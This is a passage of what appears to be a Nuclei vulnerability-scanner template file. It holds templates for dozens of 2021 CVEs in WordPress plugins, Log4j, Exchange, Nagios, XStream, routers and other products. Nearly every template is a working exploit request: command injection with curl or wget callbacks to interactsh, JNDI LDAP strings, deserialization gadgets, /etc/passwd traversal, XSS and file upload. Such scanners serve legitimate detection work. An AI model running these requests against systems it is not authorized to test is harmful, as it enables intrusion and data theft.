{{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\"rc\":(.*?)","\"msg\":\"(.*?)\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45428","info":{"name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n","PUT /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n\nCVE-2021-45428\n","GET /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 404 && status_code_2 == 201","contains(body_3, \"CVE-2021-45428\") && status_code_3 == 200"],"condition":"and"}]}]},{"id":"CVE-2021-38540","info":{"name":"Apache Airflow - Unauthenticated Variable Import","severity":"critical"},"requests":[{"raw":["GET /login/ HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","POST /variable/varimport HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryB874qcjbpxTP1Hj7\nReferer: {{RootURL}}/admin/variable/\n\n------WebKitFormBoundaryB874qcjbpxTP1Hj7\nContent-Disposition: form-data; name=\"csrf_token\"\n\n{{csrf}}\n------WebKitFormBoundaryB874qcjbpxTP1Hj7\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.json\"\nContent-Type: application/json\n\n{\n    \"type\": \"{{randstr}}\"\n}\n\n------WebKitFormBoundaryB874qcjbpxTP1Hj7--\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"Sign In\")","status_code_2 == 302","contains(header_2, \"session=.\")"],"condition":"and"},{"type":"word","words":["You should be redirected automatically to target URL: <a href=\"/\">"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["type=\"hidden\" value=\"(.*?)\">"],"internal":true}]}]},{"id":"CVE-2021-24239","info":{"name":"WordPress Pie Register <3.7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=pr_new_registration_form&show_dash_widget=1&invitaion_code=PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pOzwvc2NyaXB0Pg=="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"<script>alert(document.domain);</script>\") && contains(body, \"invitaion-code-table\")"],"condition":"and"}]}]},{"id":"CVE-2021-25111","info":{"name":"WordPress English Admin <1.5.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-39350","info":{"name":"FV Flowplayer Video Player WordPress plugin  - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=fv_player_stats&player_id=1</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","<h1>FV Player Stats</h1>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24875","info":{"name":"WordPress eCommerce Product Catalog <3.0.39 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=al_product&page=product-settings.php&ic-settings-search=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\")","contains(body_2, \"eCommerce Product Catalog\")"],"condition":"and"}]}]},{"id":"CVE-2021-24320","info":{"name":"WordPress Bello Directory & Listing Theme <1.6.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34370","info":{"name":"Accela Civic Platform <=21.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-27909","info":{"name":"Mautic <3.3.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/passwordreset?bundle=';alert(document.domain);var+ok='"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'';alert(document.domain);var ok='","mauticBasePath"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21745","info":{"name":"ZTE MF971R - Referer authentication bypass","severity":"medium"},"requests":[{"raw":["GET /goform/goform_get_cmd_process?cmd=psw_fail_num_str HTTP/1.1\nHost: {{Hostname}}\nReferer: http://interact.sh/127.0.0.1.html\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["psw_fail_num_str\":\"[0-9]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40973","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[lastname]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33357","info":{"name":"RaspAP <=2.6.5 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax/networking/get_netcfg.php?iface=;curl%20{{interactsh-url}}/`whoami`;"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["DHCPEnabled"]}],"extractors":[{"type":"regex","group":1,"regex":["GET \\/([a-z-]+) HTTP"],"part":"interactsh_request"}]}]},{"id":"CVE-2021-34643","info":{"name":"WordPress Skaut Bazar <1.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/options-general.php/</script><script>alert(document.domain)</script>/?page=skatubazar_option HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46704","info":{"name":"GenieACS => 1.2.8 - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/ping/;`id`"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","part":"body","regex":["uid=([0-9]+)"]},{"type":"status","status":[500]}],"extractors":[{"type":"regex","regex":["uid=(\\d+)\\((\\w+)\\)"],"part":"body"}]}]},{"id":"CVE-2021-46417","info":{"name":"Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password="],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-20123","info":{"name":"Draytek VigorConnect 1.6.0-B - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything","{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24146","info":{"name":"WordPress Modern Events Calendar Lite <5.16.5 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["mec-events","text/csv"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21311","info":{"name":"Adminer <4.7.9 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nauth[driver]=elastic&auth[server]=example.org&auth[username]={{to_lower(rand_base(8))}}&auth[password]={{to_lower(rand_base(8))}}&auth[db]={{to_lower(rand_base(8))}}\n"],"payloads":{"path":["/index.php","/adminer.php","/adminer/adminer.php","/adminer/index.php","/_adminer.php","/_adminer/index.php"]},"attack":"batteringram","stop-at-first-match":true,"cookie-reuse":true,"redirects":true,"max-redirects":1,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>400 - Bad Request</title>","&lt;title&gt;400 - Bad Request&lt;/title&gt;"],"condition":"or"},{"type":"status","status":[403]}]}]},{"id":"CVE-2021-37305","info":{"name":"Jeecg Boot <= 2.4.5 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jeecg-boot/sys/user/querySysUser?username=admin"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["username\":\"admin","success\":true","result\":{"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28150","info":{"name":"Hongdian H8922 3.0.5 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /backup2.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic Z3Vlc3Q6Z3Vlc3Q=\n","GET /backup2.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46YWRtaW4=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"word","part":"body","words":["CLI configuration saved from vty","service webadmin"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46381","info":{"name":"D-Link DAP-1620 - Local File Inclusion","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/apply.cgi"],"body":"action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-20837","info":{"name":"MovableType - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodCall>\n  <methodName>mt.handler_to_coderef</methodName>\n  <params>\n    <param>\n      <value>\n        <base64>\n          {{base64(\"`wget http://{{interactsh-url}}`\")}}\n        </base64>\n      </value>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["failed loading package"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39146","info":{"name":"XStream 1.4.18 - Arbitrary Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<sorted-set>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>test</type>\n    <value class='javax.swing.MultiUIDefaults' serialization='custom'>\n      <unserializable-parents/>\n      <hashtable>\n          <default>\n            <loadFactor>0.75</loadFactor>\n            <threshold>525</threshold>\n          </default>\n          <int>700</int>\n          <int>0</int>\n      </hashtable>\n      <javax.swing.UIDefaults>\n          <default>\n            <defaultLocale>zh_CN</defaultLocale>\n            <resourceCache/>\n          </default>\n      </javax.swing.UIDefaults>\n      <javax.swing.MultiUIDefaults>\n          <default>\n            <tables>\n            <javax.swing.UIDefaults serialization='custom'>\n              <unserializable-parents/>\n              <hashtable>\n                <default>\n                  <loadFactor>0.75</loadFactor>\n                  <threshold>525</threshold>\n                </default>\n                <int>700</int>\n                <int>1</int>\n                <string>lazyValue</string>\n                <javax.swing.UIDefaults_-ProxyLazyValue>\n                  <className>javax.naming.InitialContext</className>\n                  <methodName>doLookup</methodName>\n                  <args>\n                    <string>ldap://{{interactsh-url}}/#evil</string>\n                  </args>\n                </javax.swing.UIDefaults_-ProxyLazyValue>\n              </hashtable>\n              <javax.swing.UIDefaults>\n                <default>\n                  <defaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/>\n                  <resourceCache/>\n                </default>\n              </javax.swing.UIDefaults>\n            </javax.swing.UIDefaults>\n            </tables>\n          </default>\n      </javax.swing.MultiUIDefaults>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>test</type>\n    <value class='com.sun.org.apache.xpath.internal.objects.XString'>\n      <m__obj class='string'>test</m__obj>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n</sorted-set>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-27358","info":{"name":"Grafana Unauthenticated Snapshot Creation","severity":"high"},"requests":[{"raw":["POST /api/snapshots HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"dashboard\": {\"editable\":false,\"hideControls\":true,\"nav\":[{\"enable\":false,\"type\":\"timepicker\"}],\"rows\": [{}],\"style\":\"dark\",\"tags\":[],\"templating\":{\"list\":[]},\"time\":{},\"timezone\":\"browser\",\"title\":\"Home\",\"version\":5},\"expires\": 3600}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"deleteUrl\":","\"deleteKey\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2021-26723","info":{"name":"Jenzabar 9.2x-9.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ics?tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40972","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[mail]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40822","info":{"name":"Geoserver - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /geoserver/TestWfsPost HTTP/1.1\nHost: oast.pro\nContent-Type: application/x-www-form-urlencoded\n\nform_hf_0=&url=http://oast.pro/geoserver/../&body=&username=&password=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<b>Interactsh</b>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-30128","info":{"name":"Apache OFBiz <17.12.07 - Arbitrary Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/SOAPService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ser=\"http://ofbiz.apache.org/service/\">\n  <soapenv:Header/>\n    <soapenv:Body>\n      <ser>\n        <map-Map>\n          <map-Entry>\n            <map-Key>\n              <cus-obj>{{generate_java_gadget(\"dns\", \"https://{{interactsh-url}}\", \"hex\")}}</cus-obj>\n            </map-Key>\n          <map-Value>\n        <std-String/>\n        </map-Value>\n        </map-Entry>\n      </map-Map>\n      </ser>\n    </soapenv:Body>\n</soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["value=\"errorMessage\""]}]}]},{"id":"CVE-2021-44138","info":{"name":"Caucho Resin >=4.0.52 <=4.0.56 - Directory traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/;/WEB-INF/web.xml","{{BaseURL}}/resin-doc/;/WEB-INF/resin-web.xml"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","</web-app>"],"condition":"and"},{"type":"word","part":"header","words":["text/xml","application/xml"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26855","info":{"name":"Microsoft Exchange Server SSRF Vulnerability","severity":"critical"},"requests":[{"raw":["GET /owa/auth/x.js HTTP/1.1\nHost: {{Hostname}}\nCookie: X-AnonResource=true; X-AnonResource-Backend={{interactsh-url}}/ecp/default.flt?~3;\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-24917","info":{"name":"WordPress WPS Hide Login <1.9.1 - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nReferer: something\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(location), 'wp-login.php')"]},{"type":"word","part":"header","words":["redirect_to=%2Fwp-admin%2Fsomething&reauth=1"]}],"extractors":[{"type":"kval","kval":["location"]}]}]},{"id":"CVE-2021-36580","info":{"name":"IceWarp Mail Server - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/basic/?referer=https://interact.sh&_c=auth&ctz=120&signup_password=&_a%5bsignup%5d=1"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-20167","info":{"name":"Netgear RAX43 1.0.3.96 - Command Injection/Authentication Bypass Buffer Overrun","severity":"high"},"requests":[{"raw":["POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1\nHost: {{Hostname}}\n\n\"name\":\"';$(curl {{interactsh-url}});'\",\n\"email\":\"a@b.c\"\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-3377","info":{"name":"npm ansi_up v4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /\\u001B]8;;https://interact.sh\"/onmouseover=\"alert(1)\\u0007example\\u001B]8;;\\u0007 HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","words":["sh\"/onmouseover=\"alert(1)\">"]}]}]},{"id":"CVE-2021-24351","info":{"name":"WordPress The Plus Addons for Elementor <4.1.12 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=theplus_more_post&post_type=any&posts_per_page=10&offset=0&display_button=yes&post_load=products&animated_columns=test%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","the-plus-addons-for-elementor"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43421","info":{"name":"Studio-42 elFinder <2.1.60 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name={{randstr}}.php:aaa HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /elFinder/php/connector.minimal.php?cmd=put&target={{hash}}&content={{randstr_1}} HTTP/1.1\nHost: {{Hostname}}\n","GET /elfinder/files/{{randstr}}.php%3Aaaa?_t= HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_3, \"{{randstr_1}}\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"hash","group":1,"regex":["\"hash\"\\:\"(.*?)\"\\,"],"internal":true}]}]},{"id":"CVE-2021-44228","info":{"name":"Apache Log4j2 Remote Code Injection","severity":"critical"},"requests":[{"raw":["GET /?x=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/a} HTTP/1.1\nHost: {{Hostname}}\n","GET / HTTP/1.1\nHost: {{Hostname}}\nAccept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}}\nAccept-Encoding: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptencoding.{{interactsh-url}}}\nAccept-Language: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptlanguage.{{interactsh-url}}}\nAccess-Control-Request-Headers: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}\nAccess-Control-Request-Method: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}\nAuthentication: Basic ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbasic.{{interactsh-url}}}\nAuthentication: Bearer ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbearer.{{interactsh-url}}}\nCookie: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookievalue.{{interactsh-url}}}\nLocation: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.location.{{interactsh-url}}}\nOrigin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.origin.{{interactsh-url}}}\nReferer: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.referer.{{interactsh-url}}}\nUpgrade-Insecure-Requests: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.upgradeinsecurerequests.{{interactsh-url}}}\nUser-Agent: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.useragent.{{interactsh-url}}}\nX-Api-Version: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xapiversion.{{interactsh-url}}}\nX-CSRF-Token: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xcsrftoken.{{interactsh-url}}}\nX-Druid-Comment: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xdruidcomment.{{interactsh-url}}}\nX-Forwarded-For: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xforwardedfor.{{interactsh-url}}}\nX-Origin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xorigin.{{interactsh-url}}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"regex","part":"interactsh_request","regex":["\\d{6}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"]}],"extractors":[{"type":"kval","kval":["interactsh_ip"]},{"type":"regex","group":2,"regex":["\\d{6}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"},{"type":"regex","group":1,"regex":["\\d{6}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"}]}]},{"id":"CVE-2021-42551","info":{"name":"NetBiblio WebOPAC - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%27%2Balert%281%29%2B%27x","{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%5C%27%2Balert%281%29%2C%2F%2F"],"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SearchTerm: 'x'+alert(1)+'x',","SearchTerm: 'x\\\\'+alert(1),//',"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["NetBiblio"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25297","info":{"name":"Nagios 5.5.6-5.7.5 - Authenticated Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n","GET /nagiosxi/index.php HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=3&wizard=switch&ip_address=127.0.0.1%22%3b%20wget%20{{interactsh-url}}%3b&snmpopts%5bsnmpcommunity%5d=public&scaninterfaces=on HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body_4","words":["<b>Ping</b>","Switch Details"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=['\"]nsp['\"] value=['\"](.*)['\"]>"],"internal":true,"part":"body"},{"type":"regex","name":"nsp_auth","group":1,"regex":["var nsp_str = ['\"](.*)['\"];"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-25028","info":{"name":"WordPress Event Tickets < 5.2.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-21087","info":{"name":"Adobe ColdFusion - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cf_scripts/scripts/ajax/package/cfajax.js","{{BaseURL}}/cf-scripts/scripts/ajax/package/cfajax.js","{{BaseURL}}/CFIDE/scripts/ajax/package/cfajax.js","{{BaseURL}}/cfide/scripts/ajax/package/cfajax.js","{{BaseURL}}/CF_SFSD/scripts/ajax/package/cfajax.js","{{BaseURL}}/cfide-scripts/ajax/package/cfajax.js","{{BaseURL}}/cfmx/CFIDE/scripts/ajax/package/cfajax.js"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["eval\\(\\\"\\(\\\"\\+json\\+\\\"\\)\\\"\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24827","info":{"name":"WordPress Asgaros Forum <1.15.13 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET 